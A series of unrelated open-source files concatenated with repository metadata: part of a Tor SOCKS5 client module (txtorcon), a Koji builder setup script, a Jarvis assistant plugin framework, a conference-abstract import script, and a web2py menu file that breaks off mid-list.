# I feel like maybe i'm doing all this buffering-stuff
# wrong. but I also don't want a bunch of "received 1 byte"
# etc states hanging off everything that can "get data"
self._data += data
self.got_data()
@_machine.output()
def _parse_version_reply(self):
"waiting for a version reply"
if len(self._data) >= 2:
reply = self._data[:2]
self._data = self._data[2:]
(version, method) = struct.unpack('BB', reply)
if version == 5 and method in [0x00, 0x02]:
self.version_reply(method)
else:
if version != 5:
self.version_error(SocksError(
"Expected version 5, got {}".format(version)))
else:
self.version_error(SocksError(
"Wanted method 0 or 2, got {}".format(method)))
def _parse_ipv4_reply(self):
if len(self._data) >= 10:
addr = inet_ntoa(self._data[4:8])
port = struct.unpack('H', self._data[8:10])[0]
self._data = self._data[10:]
if self._req_type == 'CONNECT':
self.reply_ipv4(addr, port)
else:
self.reply_domain_name(addr)
def _parse_ipv6_reply(self):
if len(self._data) >= 22:
addr = self._data[4:20]
port = struct.unpack('H', self._data[20:22])[0]
self._data = self._data[22:]
self.reply_ipv6(addr, port)
def _parse_domain_name_reply(self):
assert len(self._data) >= 8 # _parse_request_reply checks this
addrlen = struct.unpack('B', self._data[4:5])[0]
# may simply not have received enough data yet...
if len(self._data) < (5 + addrlen + 2):
return
addr = self._data[5:5 + addrlen]
# port = struct.unpack('H', self._data[5 + addrlen:5 + addrlen + 2])[0]
self._data = self._data[5 + addrlen + 2:]
self.reply_domain_name(addr)
@_machine.output()
def _parse_request_reply(self):
"waiting for a reply to our request"
# we need at least 6 bytes of data: 4 for the "header", such
# as it is, and 2 more if it's DOMAINNAME (for the size) or 4
# or 16 more if it's an IPv4/6 address reply. plus there's 2
# bytes on the end for the bound port.
if len(self._data) < 8:
return
msg = self._data[:4]
# not changing self._data yet, in case we've not got
# enough bytes so far.
(version, reply, _, typ) = struct.unpack('BBBB', msg)
if version != 5:
self.reply_error(SocksError(
"Expected version 5, got {}".format(version)))
return
if reply != self.SUCCEEDED:
self.reply_error(_create_socks_error(reply))
return
reply_dispatcher = {
self.REPLY_IPV4: self._parse_ipv4_reply,
self.REPLY_HOST: self._parse_domain_name_reply,
self.REPLY_IPV6: self._parse_ipv6_reply,
}
try:
method = reply_dispatcher[typ]
except KeyError:
self.reply_error(SocksError(
"Unexpected response type {}".format(typ)))
return
method()
@_machine.output()
def _make_connection(self, addr, port):
"make our proxy connection"
sender = self._create_connection(addr, port)
# XXX look out! we're depending on this "sender" implementing
# certain Twisted APIs, and the state-machine shouldn't depend
# on that.
# XXX also, if sender implements producer/consumer stuff, we
# should register ourselves (and implement it to) -- but this
# should really be taking place outside the state-machine in
# "the I/O-doing" stuff
self._sender = sender
self._when_done.fire(sender)
@_machine.output()
def _domain_name_resolved(self, domain):
self._when_done.fire(domain)
@_machine.input()
def connection(self):
"begin the protocol (i.e. connection made)"
@_machine.input()
def disconnected(self, error):
"the connection has gone away"
@_machine.input()
def got_data(self):
"we recevied some data and buffered it"
@_machine.input()
def version_reply(self, auth_method):
"the SOCKS server replied with a version"
@_machine.input()
def version_error(self, error):
"the SOCKS server replied, but we don't understand"
@_machine.input()
def reply_error(self, error):
"the SOCKS server replied with an error"
@_machine.input()
def reply_ipv4(self, addr, port):
"the SOCKS server told me an IPv4 addr, port"
@_machine.input()
def reply_ipv6(self, addr, port):
"the SOCKS server told me an IPv6 addr, port"
@_machine.input()
def reply_domain_name(self, domain):
"the SOCKS server told me a domain-name"
@_machine.input()
def answer(self):
"the SOCKS server replied with an answer"
@_machine.output()
def _send_version(self):
"sends a SOCKS version reply"
self._data_to_send(
# for anonymous(0) *and* authenticated (2): struct.pack('BBBB', 5, 2, 0, 2)
struct.pack('BBB', 5, 1, 0)
)
@_machine.output()
def _disconnect(self, error):
"done"
if self._on_disconnect:
self._on_disconnect(str(error))
if self._sender:
self._sender.connectionLost(Failure(error))
self._when_done.fire(Failure(error))
@_machine.output()
def _send_request(self, auth_method):
"send the request (connect, resolve or resolve_ptr)"
assert auth_method == 0x00 # "no authentication required"
return self._dispatch[self._req_type](self)
@_machine.output()
def _relay_data(self):
"relay any data we have"
if self._data:
d = self._data
self._data = b''
# XXX this is "doing I/O" in the state-machine and it
# really shouldn't be ... probably want a passed-in
# "relay_data" callback or similar?
self._sender.dataReceived(d)
def _send_connect_request(self):
"sends CONNECT request"
# XXX needs to support v6 ... or something else does
host = self._addr.host
port = self._addr.port
if isinstance(self._addr, (IPv4Address, IPv6Address)):
is_v6 = isinstance(self._addr, IPv6Address)
self._data_to_send(
struct.pack(
                    '!BBBB{}sH'.format(16 if is_v6 else 4),  # IPv6 addresses are 16 bytes, not 4
5, # version
0x01, # command
0x00, # reserved
0x04 if is_v6 else 0x01,
inet_pton(AF_INET6 if is_v6 else AF_INET, host),
port,
)
)
else:
host = host.encode('ascii')
self._data_to_send(
struct.pack(
'!BBBBB{}sH'.format(len(host)),
5, # version
0x01, # command
0x00, # reserved
0x03,
len(host),
host,
port,
)
)
@_machine.output()
def _send_resolve_request(self):
"sends RESOLVE_PTR request (Tor custom)"
host = self._addr.host.encode()
self._data_to_send(
struct.pack(
'!BBBBB{}sH'.format(len(host)),
5, # version
0xF0, # command
0x00, # reserved
0x03, # DOMAINNAME
len(host),
host,
0, # self._addr.port?
)
)
@_machine.output()
def _send_resolve_ptr_request(self):
"sends RESOLVE_PTR request (Tor custom)"
        # ATYP is 0x01 for IPv4 and 0x04 for IPv6; _create_ip_address()
        # hands us twisted address objects, not ipaddress ones.
        addr_type = 0x01 if isinstance(self._addr, IPv4Address) else 0x04
        encoded_host = inet_aton(self._addr.host)
self._data_to_send(
struct.pack(
'!BBBB4sH',
5, # version
0xF1, # command
0x00, # reserved
addr_type,
encoded_host,
0, # port; unused? SOCKS is fun
)
)
@_machine.state(initial=True)
def unconnected(self):
"not yet connected"
@_machine.state()
def sent_version(self):
"we've sent our version request"
@_machine.state()
def sent_request(self):
"we've sent our stream/etc request"
@_machine.state()
def relaying(self):
"received our response, now we can relay"
@_machine.state()
def abort(self, error_message):
"we've encountered an error"
@_machine.state()
def done(self):
"operations complete"
unconnected.upon(
connection,
enter=sent_version,
outputs=[_send_version],
)
sent_version.upon(
got_data,
enter=sent_version,
outputs=[_parse_version_reply],
)
sent_version.upon(
version_error,
enter=abort,
outputs=[_disconnect],
)
sent_version.upon(
version_reply,
enter=sent_request,
outputs=[_send_request],
)
sent_version.upon(
disconnected,
enter=unconnected,
outputs=[_disconnect]
)
sent_request.upon(
got_data,
enter=sent_request,
outputs=[_parse_request_reply],
)
sent_request.upon(
reply_ipv4,
enter=relaying,
outputs=[_make_connection],
)
sent_request.upon(
reply_ipv6,
enter=relaying,
outputs=[_make_connection],
)
# XXX this isn't always a _domain_name_resolved -- if we're a
# req_type CONNECT then it's _make_connection_domain ...
sent_request.upon(
reply_domain_name,
enter=done,
outputs=[_domain_name_resolved],
)
sent_request.upon(
reply_error,
enter=abort,
outputs=[_disconnect],
)
# XXX FIXME this needs a test
sent_request.upon(
disconnected,
enter=abort,
outputs=[_disconnect], # ... or is this redundant?
)
relaying.upon(
got_data,
enter=relaying,
outputs=[_relay_data],
)
relaying.upon(
disconnected,
enter=done,
outputs=[_disconnect],
)
abort.upon(
got_data,
enter=abort,
outputs=[],
)
abort.upon(
disconnected,
enter=abort,
outputs=[],
)
done.upon(
disconnected,
enter=done,
outputs=[],
)
_dispatch = {
'CONNECT': _send_connect_request,
'RESOLVE': _send_resolve_request,
'RESOLVE_PTR': _send_resolve_ptr_request,
}
class _TorSocksProtocol(Protocol):
def __init__(self, host, port, socks_method, factory):
self._machine = _SocksMachine(
req_type=socks_method,
host=host, # noqa unicode() on py3, py2? we want idna, actually?
port=port,
on_disconnect=self._on_disconnect,
on_data=self._on_data,
create_connection=self._create_connection,
)
self._factory = factory
def when_done(self):
return self._machine.when_done()
def connectionMade(self):
self._machine.connection()
        # we notify via the factory that we have the
# locally-connecting host -- this is e.g. used by the "stream
# over one particular circuit" code to determine the local
# port that "our" SOCKS connection went to
self.factory._did_connect(self.transport.getHost())
def connectionLost(self, reason):
self._machine.disconnected(SocksError(reason))
def dataReceived(self, data):
self._machine.feed_data(data)
def _on_data(self, data):
self.transport.write(data)
def _create_connection(self, addr, port):
addr = IPv4Address('TCP', addr, port)
sender = self._factory.buildProtocol(addr)
client_proxy = portforward.ProxyClient()
sender.makeConnection(self.transport)
# portforward.ProxyClient is going to call setPeer but this
# probably doesn't have it...
setattr(sender, 'setPeer', lambda _: None)
client_proxy.setPeer(sender)
self._sender = sender
return sender
def _on_disconnect(self, error_message):
self.transport.loseConnection()
# self.transport.abortConnection()#SocksError(error_message)) ?
class _TorSocksFactory(Factory):
protocol = _TorSocksProtocol
# XXX should do validation on this stuff so we get errors before
# building the protocol
def __init__(self, *args, **kw):
self._args = args
self._kw = kw
self._host = None
self._when_connected = util.SingleObserver()
def _get_address(self):
"""
Returns a Deferred that fires with the transport's getHost()
when this SOCKS protocol becomes connected.
"""
return self._when_connected.when_fired()
def _did_connect(self, host):
self._host = host
self._when_connected.fire(host)
def buildProtocol(self, addr):
p = self.protocol(*self._args, **self._kw)
p.factory = self
return p
class SocksError(Exception):
code = None
message = ''
def __init__(self, message='', code=None):
super(SocksError, self).__init__(message or self.message)
self.message = message or self.message
self.code = code or self.code
class GeneralServerFailureError(SocksError):
code = 0x01
message = 'general SOCKS server failure'
class ConnectionNotAllowedError(SocksError):
code = 0x02
message = 'connection not allowed by ruleset'
class NetworkUnreachableError(SocksError):
code = 0x03
message = 'Network unreachable'
class HostUnreachableError(SocksError):
code = 0x04
message = 'Host unreachable'
class ConnectionRefusedError(SocksError):
code = 0x05
message = 'Connection refused'
class TtlExpiredError(SocksError):
code = 0x06
message = 'TTL expired'
class CommandNotSupportedError(SocksError):
code = 0x07
message = 'Command not supported'
class AddressTypeNotSupportedError(SocksError):
code = 0x08
message = 'Address type not supported'
_socks_errors = {cls.code: cls for cls in SocksError.__subclasses__()}
def _create_socks_error(code):
try:
return _socks_errors[code]()
except KeyError:
return SocksError("Unknown SOCKS error-code {}".format(code),
code=code)
@inlineCallbacks
def resolve(tor_endpoint, hostname):
"""
This is easier to use via :meth:`txtorcon.Tor.dns_resolve`
:param tor_endpoint: the Tor SOCKS endpoint to use.
:param hostname: the hostname to look up.
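
    A minimal sketch (``socks_ep`` is assumed to be any endpoint that
    reaches a Tor SOCKS port)::

        answer = yield resolve(socks_ep, u'torproject.org')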
"""
if six.PY2 and isinstance(hostname, str):
hostname = unicode(hostname) # noqa
elif six.PY3 and isinstance(hostname, bytes):
hostname = hostname.decode('ascii')
factory = _TorSocksFactory(
hostname, 0, 'RESOLVE', None,
)
proto = yield tor_endpoint.connect(factory)
result = yield proto.when_done()
returnValue(result)
@inlineCallbacks
def resolve_ptr(tor_endpoint, ip):
"""
This is easier to use via :meth:`txtorcon.Tor.dns_resolve_ptr`
:param tor_endpoint: the Tor SOCKS endpoint to use.
:param ip: the IP address to look up.
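
    A minimal sketch (``socks_ep`` as above)::

        name = yield resolve_ptr(socks_ep, u'8.8.8.8')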
"""
if six.PY2 and isinstance(ip, str):
ip = unicode(ip) # noqa
elif six.PY3 and isinstance(ip, bytes):
ip = ip.decode('ascii')
factory = _TorSocksFactory(
ip, 0, 'RESOLVE_PTR', None,
)
proto = yield tor_endpoint.connect(factory)
result = yield proto.when_done()
returnValue(result)
@implementer(IStreamClientEndpoint)
class TorSocksEndpoint(object):
"""
Represents an endpoint which will talk to a Tor SOCKS port.
These should usually not be instantiated directly, instead use
:meth:`txtorcon.TorConfig.socks_endpoint`.
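
    A sketch of direct use (``socks_ep`` is assumed to be an
    IStreamClientEndpoint for a Tor SOCKS port)::

        ep = TorSocksEndpoint(socks_ep, u'torproject.org', 443, tls=True)
        proto = yield ep.connect(some_factory)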
"""
# XXX host, port args should be (host, port) tuple, or
# IAddress-implementer?
def __init__(self, socks_endpoint, host, port, tls=False):
self._proxy_ep = socks_endpoint # can be Deferred
assert self._proxy_ep is not None
if six.PY2 and isinstance(host, str):
host = unicode(host) # noqa
if six.PY3 and isinstance(host, bytes):
host = host.decode('ascii')
self._host = host
self._port = port
self._tls = tls
self._socks_factory = None
self._when_address = util.SingleObserver()
def _get_address(self):
"""
Returns a Deferred that fires with the source IAddress of the
underlying SOCKS connection (i.e. usually a
twisted.internet.address.IPv4Address)
circuit.py uses this; better suggestions welcome!
"""
return self._when_address.when_fired()
@inlineCallbacks
def connect(self, factory):
# further wrap the protocol if we're doing TLS.
# "pray i do not wrap the protocol further".
if self._tls:
# XXX requires Twisted 14+
from twisted.internet.ssl import optionsForClientTLS
if self._tls is True:
context = optionsForClientTLS(self._host)
else:
context = self._tls
tls_factory = tls.TLSMemoryBIOFactory(context, True, factory)
socks_factory = _TorSocksFactory(
self._host, self._port, 'CONNECT', tls_factory,
)
else:
socks_factory = _TorSocksFactory(
self._host, self._port, 'CONNECT', factory,
)
self._socks_factory = socks_factory
# forward our address (when we get it) to any listeners
self._socks_factory._get_address().addBoth(self._when_address.fire)
# XXX isn't this just maybeDeferred()
if isinstance(self._proxy_ep, Deferred):
proxy_ep = yield self._proxy_ep
if not IStreamClientEndpoint.providedBy(proxy_ep):
raise ValueError(
"The Deferred provided as 'socks_endpoint' must "
"resolve to an IStreamClientEndpoint provider (got "
"{})".format(type(proxy_ep).__name__)
)
else:
proxy_ep = self._proxy_ep
# socks_proto = yield proxy_ep.connect(socks_factory)
proto = yield proxy_ep.connect(socks_factory)
wrapped_proto = yield proto.when_done()
if self._tls:
returnValue(wrapped_proto.wrappedProtocol)
else:
returnValue(wrapped_proto)
| mit | 3,089,544,794,076,965,400 | 29.910053 | 87 | 0.572663 | false |
ASzc/nagoya | cfg/koji-builder/setup.py | 1 | 1421 | #!/usr/bin/env python2
# References:
# https://fedoraproject.org/wiki/Koji/ServerHowTo
# https://github.com/sbadakhc/kojak/blob/master/scripts/install/install
import util.cfg as cfg
import util.pkg as pkg
import util.cred as cred
from util.log import log
#
# Setup
#
log.info("General update")
pkg.clean()
pkg.update()
log.info("Install EPEL")
pkg.install("https://dl.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm")
#
# Kojid (Koji Builder)
#
log.info("Install Koji Builder")
pkg.install("koji-builder")
koji_url = dict()
koji_url["web"] = "http://koji/koji"
koji_url["top"] = "http://koji/kojifiles"
koji_url["hub"] = "http://koji/kojihub"
log.info("Configure Koji Builder")
with cfg.mod_ini("/etc/kojid/kojid.conf") as i:
i.kojid.sleeptime = 2
i.kojid.maxjobs = 20
i.kojid.server = koji_url["hub"]
i.kojid.topurl = koji_url["top"]
# i.kojid.cert is set at runtime
i.kojid.ca = cred.ca_crt
i.kojid.serverca = cred.ca_crt
i.kojid.smtphost = "koji"
i.kojid.from_addr = "Koji Build System <buildsys@kojibuilder>"
#
# Koji CLI
#
log.info("Configure Koji CLI")
with cfg.mod_ini("/etc/koji.conf") as i:
i.koji.server = koji_url["hub"]
i.koji.weburl = koji_url["web"]
i.koji.topurl = koji_url["top"]
i.koji.topdir = "/mnt/koji"
i.koji.cert = cred.user["kojiadmin"].pem
i.koji.ca = cred.ca_crt
i.koji.serverca = cred.ca_crt
pkg.clean()
| lgpl-3.0 | 7,909,976,828,980,517,000 | 22.295082 | 89 | 0.670654 | false |
appi147/Jarvis | jarviscli/plugin.py | 1 | 6525 | from inspect import cleandoc, isclass
import pluginmanager
from requests import ConnectionError
# Constants
# platform
MACOS = "MACOS"
LINUX = "LINUX"
WINDOWS = "WINDOWS"
# Shortcut for MACOS + LINUX
UNIX = "UNIX"
def plugin(name):
"""
Convert function in Plugin Class
@python(platform=LINUX, native="ap-hotspot")
def hotspot_start(jarvis, s):
system("sudo ap-hotspot start")
"""
def create_plugin(run):
plugin_class = type(
run.__name__, Plugin.__bases__, dict(
Plugin.__dict__))
plugin_class.__doc__ = run.__doc__
if isclass(run):
# class -> object
run = run()
# create class
plugin_class._require = []
plugin_class._complete = []
plugin_class._alias = []
plugin_class._name = name
plugin_class._backend = (run,)
plugin_class._backend_instance = run
return plugin_class
return create_plugin
def require(network=None, platform=None, native=None):
require = []
if network is not None:
require.append(('network', network))
if platform is not None:
require.append(('platform', platform))
if native is not None:
require.append(('native', native))
def __require(plugin):
plugin._require.extend(require)
return plugin
return __require
def complete(*complete):
def __complete(plugin):
plugin._complete.extend(complete)
return plugin
return __complete
def alias(*alias):
def __alias(plugin):
plugin._alias.extend(alias)
return plugin
return __alias
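# Illustrative stacking of the decorators above (hypothetical plugin):
# @plugin() must sit closest to the function so that the modifiers
# receive a Plugin class rather than a bare function.
#
#   @require(network=True, platform=LINUX)
#   @alias("forecast")
#   @plugin("weather")
#   def weather(jarvis, s):
#       ...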
def _yield_something(values):
for value in values:
yield value
class PluginStorage(object):
def __init__(self):
self._sub_plugins = {}
def add_plugin(self, name, plugin_to_add):
self._sub_plugins[name] = plugin_to_add
def get_plugins(self, name=None):
if name is None:
return self._sub_plugins
if name in self._sub_plugins:
return self._sub_plugins[name]
return None
def change_with(self, plugin_new):
plugin_new._sub_plugins = self._sub_plugins
class Plugin(pluginmanager.IPlugin, PluginStorage):
"""
"""
_backend = None
def __init__(self):
super(pluginmanager.IPlugin, self).__init__()
self._sub_plugins = {}
def init(self, jarvis_api):
"""
Called before Jarvis starts;
Passes jarvis_api object for plugins to do initialization.
(would not be possible with __init__)
"""
        if self.is_callable_plugin():
            backend = self._backend[0]
            init = getattr(backend.__class__, "init", None)
            if callable(init):
                backend.init(jarvis_api)
for plugin in self.get_plugins().values():
plugin.init(jarvis_api)
def is_callable_plugin(self):
"""
        Return True if this plugin has an executable implementation (e.g. news);
        return False if this instance is only used for calling other plugins
(e.g. movie in 'movie search' and 'movie plot')
"""
return self._backend is not None
def get_name(self):
"""Set with @plugin(name)"""
return self._name
def require(self):
"""Set with @require"""
return self._require
def alias(self):
"""Set with @alias"""
return self._alias
def complete(self):
"""Set with @complete"""
# return default complete() if possible
if self.is_callable_plugin():
for complete in self._complete:
yield complete
# yield each sub command
for complete in self.get_plugins().keys():
yield complete
def get_doc(self):
"""Parses plugin doc string"""
doc = ""
examples = ""
extended_doc = ""
# default complete
if self.__doc__ is not None:
default_command_doc = cleandoc(self.__doc__)
default_command_doc = default_command_doc.split("-- Example:")
if len(default_command_doc) > 1:
examples += default_command_doc[1]
default_command_doc = default_command_doc[0]
doc += default_command_doc
if not doc.endswith("\n"):
doc += "\n"
doc += "\nSubcommands:"
# sub command complete
for name, sub_command in self.get_plugins().items():
doc += "\n-> {}: ".format(name)
sub_command_doc = sub_command.get_doc()
sub_command_doc = sub_command_doc.split("-- Example:")
if len(sub_command_doc) > 1:
examples += sub_command_doc[1]
sub_command_doc = sub_command_doc[0]
if '\n' not in sub_command_doc:
doc += sub_command_doc
else:
extended_doc += "\n {}:\n".format(name)
extended_doc += sub_command_doc
if not sub_command_doc.endswith("\n"):
extended_doc += "\n"
if extended_doc != "":
doc += "\n"
doc += extended_doc
if examples != "":
doc += "\n--Examples:"
doc += examples
return doc
def run(self, jarvis, s):
"""Entry point if this plugin is called"""
sub_command = jarvis.find_action(s, self.get_plugins().keys())
if sub_command is "None":
# run default
if self.is_callable_plugin():
self._backend[0](jarvis.get_api(), s)
else:
jarvis.get_api().say("Sorry, I could not recognise your command. Did you mean:")
for sub_command in self._sub_plugins.keys():
jarvis.get_api().say(" * {} {}".format(self.get_name(), sub_command))
else:
command = sub_command.split()[0]
new_s = " ".join(sub_command.split()[1:])
self.get_plugins(command).run(jarvis, new_s)
def _plugin_run_with_network_error(self, run_func, jarvis, s):
"""
Calls run_func(jarvis, s); try-catch ConnectionError
        This method is auto-used if require() yields ("network", True). Do not
        use manually.
"""
try:
run_func(jarvis, s)
except ConnectionError:
jarvis.get_api().connection_error()
| mit | 4,146,784,341,586,826,000 | 27.49345 | 96 | 0.540383 | false |
brigittebigi/proceed | proceed/scripts/import.py | 1 | 9928 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
# ---------------------------------------------------------------------------
# ___ __ ___ ___ ____ ____ __
# | \ | \ | | / | | | \ Automatic
# |__/ |__/ | | | |__ |__ | | Conference
# | |\_ | | | | | | | Proceedings
# | | \ |___| \___ |___ |___ |__/ Generator
# ==========================================================
#
# http://www.lpl-aix.fr/~bigi/
#
# ---------------------------------------------------------------------------
# developed at:
#
# Laboratoire Parole et Langage
#
# Copyright (C) 2013-2014 Brigitte Bigi
#
# Use of this software is governed by the GPL, v3
# This banner notice must not be removed
# ---------------------------------------------------------------------------
#
# SPPAS is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SPPAS is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SPPAS. If not, see <http://www.gnu.org/licenses/>.
#
# ---------------------------------------------------------------------------
__docformat__ = "epytext"
"""
Import abstracts from a conference and save them in a directory,
in the form of one LaTeX file per abstract.
Input can be either a sciencesconf XML file or an easychair CSV file.
There are no options for the output style: the default is used.
"""
# ---------------------------------------------------------------------------
import sys
import os.path
import getopt
sys.path.append( os.path.join(os.path.dirname(os.path.dirname( os.path.abspath(__file__))), "src") )
from DataIO.Read.reader import Reader
from DataIO.Write.writer import Writer
from structs.prefs import Preferences
from structs.abstracts_themes import all_themes
from term.textprogress import TextProgress
from term.terminalcontroller import TerminalController
from sp_glob import program, author, version, copyright, url
wxop = True
try:
import wx
from wxgui.frames.import_wizard import ImportWizard
except Exception:
wxop = False
# ----------------------------------------------------------------------
# USEFUL FUNCTIONS
# ----------------------------------------------------------------------
def usage(output):
"""
Print the usage of this script on an output.
@param output is a string representing the output (for example: sys.stdout)
"""
output.write('import.py [options] where options are:\n')
output.write(' -i file Input file name [required] \n')
output.write(' -a file Authors Input file name [required if easychair] \n')
output.write(' -o output Output directory [required] \n')
output.write(' -s status Status number (0-4) [default=1=accepted]\n')
output.write(' -r reader name One of: sciencesconf or easychair [default=sciencesconf]\n')
output.write(' -S style name One of: basic, palme, nalte [default=basic]\n')
output.write(' -c compiler One of: pdflatex, xetex [default=pdflatex]\n')
output.write(' --nocsv Do not generate '+program+' CSV files\n')
output.write(' --notex Do not generate LaTeX files\n')
output.write(' --nohtml Do not generate HTML file\n')
output.write(' --help Print this help\n\n')
# End usage
# ----------------------------------------------------------------------
def Quit(message=None, status=0, usageoutput=None):
"""
Quit the program with the appropriate exit status.
@param message is a text to communicate to the user on sys.stderr.
@param status is an integer of the status exit value.
@param usageoutput is a file descriptor.
"""
    if message: sys.stderr.write('import.py '+message)
if usageoutput: usage(usageoutput)
sys.exit(status)
# End Quit
# ----------------------------------------------------------------------
# --------------------------------------------------------------------------
# MAIN PROGRAM
# --------------------------------------------------------------------------
if __name__=="__main__":
# ----------------------------------------------------------------------
# Get all arguments, verify inputs.
# ----------------------------------------------------------------------
# Verify the program name and possibly some arguments
if len(sys.argv) == 1:
if not wxop:
# stop the program and print an error message
Quit(status=1, usageoutput=sys.stderr)
else:
app = wx.App(False)
ImportWizard(None)
app.MainLoop()
sys.exit(0)
# Get options (if any...)
try:
opts, args = getopt.getopt(sys.argv[1:], "i:a:o:s:r:S:c:", ["help", "nocsv", "notex", "nohtml"])
except getopt.GetoptError, err:
# Print help information and exit:
Quit(message="Error: "+str(err)+".\nUse option --help for any help.\n", status=1)
fileinput = None
authorsinput = None
output = None
extension = "tex"
status = 1 # only accepted papers
readername = "sciencesconf"
themename = "basic"
compiler = "pdflatex"
exportcsv = True
exporttex= True
exporthtml = True
# Extract options
for o, a in opts:
if o == "-i":
fileinput = a
elif o == "-a":
authorsinput = a
elif o == "-o":
output = a
elif o == "-s":
status = int(a)
elif o == "-r":
readername = a
elif o == "-S":
themename = a
elif o == "-c":
compiler = a
elif o == "--help": # need help
Quit(message='Help', status=0, usageoutput=sys.stdout)
elif o == "--nocsv":
exportcsv = False
elif o == "--notex":
exporttex = False
elif o == "--nohtml":
exporthtml = False
# Verify args
if fileinput is not None:
if not os.path.exists(fileinput):
Quit(message="Error: BAD input file name: "+fileinput+"\n", status=1)
else:
Quit(message="Error: an input is required.\n.", status=1, usageoutput=sys.stderr)
if output is None:
Quit(message="Error: an output is required.\n.", status=1, usageoutput=sys.stderr)
if readername == "easychair" and not authorsinput:
Quit(message="With easychair, an input file with authors is required.", status=1, usageoutput=sys.stderr)
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}'+program+' - Version '+version+'${NORMAL}')
print term.render('${BLUE}'+copyright+'${NORMAL}')
print term.render('${BLUE}'+url+'${NORMAL}')
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print '-----------------------------------------------------------------------\n'
print program+' - Version '+version
print copyright
print url+'\n'
print '-----------------------------------------------------------------------\n'
# ----------------------------------------------------------------------
p = TextProgress()
# ----------------------------------------------------------------------
# Load input data
# ----------------------------------------------------------------------
arguments = {}
arguments['readername'] = readername
arguments['filename'] = fileinput
arguments['authorsfilename'] = authorsinput
arguments['progress'] = p
reader = Reader( arguments )
# ----------------------------------------------------------------------
# Write output data (with default parameters)
# ----------------------------------------------------------------------
# Create preferences
prefs = Preferences()
theme = all_themes.get_theme(themename.lower())
prefs.SetTheme( theme )
prefs.SetValue('COMPILER', 'str', compiler.strip())
# Create the Writer
writer = Writer( reader.docs )
writer.set_status( status )
writer.set_progress( p )
# Write abstracts as LaTeX
if exporttex:
writer.writeLaTeX_as_Dir( output, prefs, tocompile=True )
# Write proceed native CSV files
if exportcsv:
writer.writeCSV( output )
# Write html file
if exporthtml:
writer.writeHTML( output+".html" )
# Done
try:
term = TerminalController()
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}')
print term.render('${RED}Result is in '+output)
print term.render('${GREEN}Thank you for using '+program+".")
print term.render('${GREEN}-----------------------------------------------------------------------${NORMAL}\n')
except:
print ('-----------------------------------------------------------------------\n')
print "Result is in "+output+".\nThank you for using "+program+"."
print ('-----------------------------------------------------------------------\n')
# ----------------------------------------------------------------------
| gpl-3.0 | -6,585,036,941,953,271,000 | 36.044776 | 119 | 0.463638 | false |
zvolsky/muzika | models/menu.py | 1 | 6740 | # -*- coding: utf-8 -*-
# this file is released under public domain and you can use without limitations
#########################################################################
## Customize your APP title, subtitle and menus here
#########################################################################
response.logo = A(B('web',SPAN(2),'py'),XML('™ '),
_class="brand",_href="http://www.web2py.com/")
response.title = request.application.replace('_',' ').title()
response.subtitle = ''
## read more at http://dev.w3.org/html5/markup/meta.name.html
response.meta.author = 'Your Name <[email protected]>'
response.meta.keywords = 'web2py, python, framework'
response.meta.generator = 'Web2py Web Framework'
## your http://google.com/analytics id
response.google_analytics_id = None
#########################################################################
## this is the main application menu add/remove items as required
#########################################################################
response.menu = [
(T('Rozpis'), False, URL('default', 'index'), [
(T('Můj rozpis'), False, URL('default', 'index'), []),
]),
]
if auth.has_membership('rozpis'):
response.menu[0][3].append((T('Celkový rozpis'), False, URL('default', 'rozpis'), []))
if auth.has_membership('admin'):
response.menu.append((T('Číselníky'), False, None, [
(T('Práva uživatelů'), False, URL('plugin_manage_groups', 'index'), []),
(T('Muzikanti (uživatelé)'), False, URL('default', 'muzikanti'), []),
(T('Místa'), False, URL('default', 'mista'), []),
]))
DEVELOPMENT_MENU = True
#########################################################################
## provide shortcuts for development. remove in production
#########################################################################
def _():
# shortcuts
app = request.application
ctr = request.controller
# useful links to internal and external resources
response.menu += [
(SPAN('web2py', _class='highlighted'), False, 'http://web2py.com', [
(T('My Sites'), False, URL('admin', 'default', 'site')),
(T('This App'), False, URL('admin', 'default', 'design/%s' % app), [
(T('Controller'), False,
URL(
'admin', 'default', 'edit/%s/controllers/%s.py' % (app, ctr))),
(T('View'), False,
URL(
'admin', 'default', 'edit/%s/views/%s' % (app, response.view))),
(T('Layout'), False,
URL(
'admin', 'default', 'edit/%s/views/layout.html' % app)),
(T('Stylesheet'), False,
URL(
'admin', 'default', 'edit/%s/static/css/web2py.css' % app)),
(T('DB Model'), False,
URL(
'admin', 'default', 'edit/%s/models/db.py' % app)),
(T('Menu Model'), False,
URL(
'admin', 'default', 'edit/%s/models/menu.py' % app)),
(T('Database'), False, URL(app, 'appadmin', 'index')),
(T('Errors'), False, URL(
'admin', 'default', 'errors/' + app)),
(T('About'), False, URL(
'admin', 'default', 'about/' + app)),
]),
('web2py.com', False, 'http://www.web2py.com', [
(T('Download'), False,
'http://www.web2py.com/examples/default/download'),
(T('Support'), False,
'http://www.web2py.com/examples/default/support'),
(T('Demo'), False, 'http://web2py.com/demo_admin'),
(T('Quick Examples'), False,
'http://web2py.com/examples/default/examples'),
(T('FAQ'), False, 'http://web2py.com/AlterEgo'),
(T('Videos'), False,
'http://www.web2py.com/examples/default/videos/'),
(T('Free Applications'),
False, 'http://web2py.com/appliances'),
(T('Plugins'), False, 'http://web2py.com/plugins'),
(T('Layouts'), False, 'http://web2py.com/layouts'),
(T('Recipes'), False, 'http://web2pyslices.com/'),
(T('Semantic'), False, 'http://web2py.com/semantic'),
]),
(T('Documentation'), False, 'http://www.web2py.com/book', [
(T('Preface'), False,
'http://www.web2py.com/book/default/chapter/00'),
(T('Introduction'), False,
'http://www.web2py.com/book/default/chapter/01'),
(T('Python'), False,
'http://www.web2py.com/book/default/chapter/02'),
(T('Overview'), False,
'http://www.web2py.com/book/default/chapter/03'),
(T('The Core'), False,
'http://www.web2py.com/book/default/chapter/04'),
(T('The Views'), False,
'http://www.web2py.com/book/default/chapter/05'),
(T('Database'), False,
'http://www.web2py.com/book/default/chapter/06'),
(T('Forms and Validators'), False,
'http://www.web2py.com/book/default/chapter/07'),
(T('Email and SMS'), False,
